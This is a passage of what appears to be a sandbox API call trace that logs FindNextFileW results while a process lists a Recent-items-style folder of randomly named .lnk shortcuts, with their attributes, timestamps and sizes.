ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0ec1da0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="-mBHtuQ4.lnk", cAlternateFileName="")) returned 1 [0094.460] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d44fe0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d44fe0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d44fe0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="0kv--h785b9BKHr7X8.mkv.lnk", cAlternateFileName="0KV--H~1.LNK")) returned 1 [0094.460] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cf8d20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cf8d20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0cf8d20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x389, dwReserved0=0x0, dwReserved1=0x0, cFileName="15FGJM2GqTiMjPf.lnk", cAlternateFileName="15FGJM~1.LNK")) returned 1 [0094.460] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d912a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d912a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0d912a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x316, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BM5 _1HkTZyXvgJAFgc.flv.lnk", cAlternateFileName="1BM5_1~1.LNK")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15278c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15278c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15278c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xa25, dwReserved0=0x0, dwReserved1=0x0, cFileName="1dc7CK 8O2M4jV0-v99j.lnk", cAlternateFileName="1DC7CK~1.LNK")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe3e500, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfe3e500, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfe3e500, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x139b, dwReserved0=0x0, dwReserved1=0x0, cFileName="1wWkN7zA3pJvJ0l2.pdf.lnk", cAlternateFileName="1WWKN7~1.LNK")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122dd40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd122dd40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd122dd40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x97c, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Ahm.lnk", cAlternateFileName="")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb44980, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb44980, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb44980, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="2cvjqDL8AbrH.lnk", cAlternateFileName="2CVJQD~1.LNK")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfeb0920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfeb0920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfeb0920, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3de, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XrQR lLdHFDJW8qX.lnk", cAlternateFileName="2XRQRL~1.LNK")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10b0f80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10b0f80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd10b0f80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1342, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Y7NVeZda.lnk", cAlternateFileName="2Y7NVE~1.LNK")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd0da00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd0da00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfd0da00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x12d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="36j-o6P YBS6oejEQ.mkv.lnk", cAlternateFileName="36J-O6~1.LNK")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd108ae20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd108ae20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd108ae20, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="4A87C_8NPb.lnk", cAlternateFileName="4A87C_~1.LNK")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e5fa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15e5fa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1371, dwReserved0=0x0, dwReserved1=0x0, cFileName="4iWuq2Z09OQUcI.flv.lnk", cAlternateFileName="4IWUQ2~1.LNK")) returned 1 [0094.461] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3ae360, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15e5fa0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4_p930HVcZ_.lnk", cAlternateFileName="4_P930~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0db7400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0db7400, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0db7400, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe39, dwReserved0=0x0, dwReserved1=0x0, cFileName="584vk2Slwl33KAWC.lnk", cAlternateFileName="584VK2~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef37a20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1501760, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1501760, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x8d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5jdQ8S.lnk", cAlternateFileName="")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bee380, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0bee380, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0bee380, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf25, dwReserved0=0x0, dwReserved1=0x0, cFileName="5K5LME1qn8ON6owMG2.lnk", cAlternateFileName="5K5LME~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0fcc740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0fcc740, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0ff28a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1846, dwReserved0=0x0, dwReserved1=0x0, cFileName="5Oehl_lcMAlFB_Z.lnk", cAlternateFileName="5OEHL_~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1716aa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd173cc00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="6jCAQWe-_9EEl7aEUjN.lnk", cAlternateFileName="6JCAQW~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd127a000, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd127a000, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd127a000, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x133b, dwReserved0=0x0, dwReserved1=0x0, cFileName="7Cu9qgyf.lnk", cAlternateFileName="")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf870f60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf870f60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="7ord0oMkDdqdZwcFM7PM.mkv.lnk", cAlternateFileName="7ORD0O~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd091a960, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd091a960, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd091a960, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="7xJk20t-OlNiKzpOa_.lnk", cAlternateFileName="7XJK20~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce9b6740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1573b80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1573b80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x8ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="8wsZ.lnk", cAlternateFileName="")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14b54a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14b54a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14b54a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe26, dwReserved0=0x0, dwReserved1=0x0, cFileName="96IsF-4ZdJysw7LW.lnk", cAlternateFileName="96ISF-~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bc8220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0bc8220, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0bc8220, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9WZXgiA1p9.lnk", cAlternateFileName="9WZXGI~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb90c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb90c40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb90c40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x983, dwReserved0=0x0, dwReserved1=0x0, cFileName="ac gZ.lnk", cAlternateFileName="ACGZ~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16583c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16583c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16583c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcoFPdLUL2Wyq3ljkzb.lnk", cAlternateFileName="ACOFPD~1.LNK")) returned 1 [0094.462] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01f6760, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd01f6760, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd01f6760, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1846, dwReserved0=0x0, dwReserved1=0x0, cFileName="ATmiRxTquKvSIqb.lnk", cAlternateFileName="ATMIRX~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x478c2f30, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0x478c2f30, ftLastWriteTime.dwHighDateTime=0x1d706ac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08ce6a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd15bfe40, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x12af, dwReserved0=0x0, dwReserved1=0x0, cFileName="AZ80w8eAVF6qLdtcVJI.lnk", cAlternateFileName="AZ80W8~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfbdcf00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfbdcf00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfbdcf00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdf5, dwReserved0=0x0, dwReserved1=0x0, cFileName="bC7JKZ.swf.lnk", cAlternateFileName="BC7JKZ~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe64660, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14db600, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdb5, dwReserved0=0x0, dwReserved1=0x0, cFileName="beaeacczBwDfQo39.lnk", cAlternateFileName="BEAEAC~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1443080, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1443080, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1443080, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe2d, dwReserved0=0x0, dwReserved1=0x0, cFileName="BfF gcaOAo_F0B_.swf.lnk", cAlternateFileName="BFFGCA~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffbb2c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffbb2c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcffe1420, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x942, dwReserved0=0x0, dwReserved1=0x0, cFileName="bIeMKBNSsvf5WRB.lnk", cAlternateFileName="BIEMKB~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0457d60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0457d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0457d60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1302, dwReserved0=0x0, dwReserved1=0x0, cFileName="bJTM1.flv.lnk", cAlternateFileName="BJTM1F~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1207be0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1207be0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1207be0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x39e, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNR8T.lnk", cAlternateFileName="")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb1e820, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16ca7e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGtmsH0_nmfPfsQOHtip.lnk", cAlternateFileName="CGTMSH~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16f0940, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16f0940, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16f0940, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="CH482b9Cr-K.ots.lnk", cAlternateFileName="CH482B~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0562700, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0562700, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0562700, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="CKk3Lv0r a.lnk", cAlternateFileName="CKK3LV~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0301100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd173cc00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd173cc00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files.lnk", cAlternateFileName="COMMON~1.LNK")) returned 1 [0094.463] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x56702640, ftLastAccessTime.dwHighDateTime=0x1d9728a, ftLastWriteTime.dwLowDateTime=0x56702640, ftLastWriteTime.dwHighDateTime=0x1d9728a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e827b60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfaf86c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfaf86c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfaf86c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xf47, dwReserved0=0x0, dwReserved1=0x0, cFileName="dFW79KlkBOtau4aDuO.lnk", cAlternateFileName="DFW79K~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a715c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a715c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a715c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="DITJBeUAzHRJy.ots.lnk", cAlternateFileName="DITJBE~1.LNK")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd135e840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd135e840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd135e840, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1321, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMtfYZ.lnk", cAlternateFileName="")) returned 1 [0094.464] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf8e3380, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf8e3380, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf8e3380, 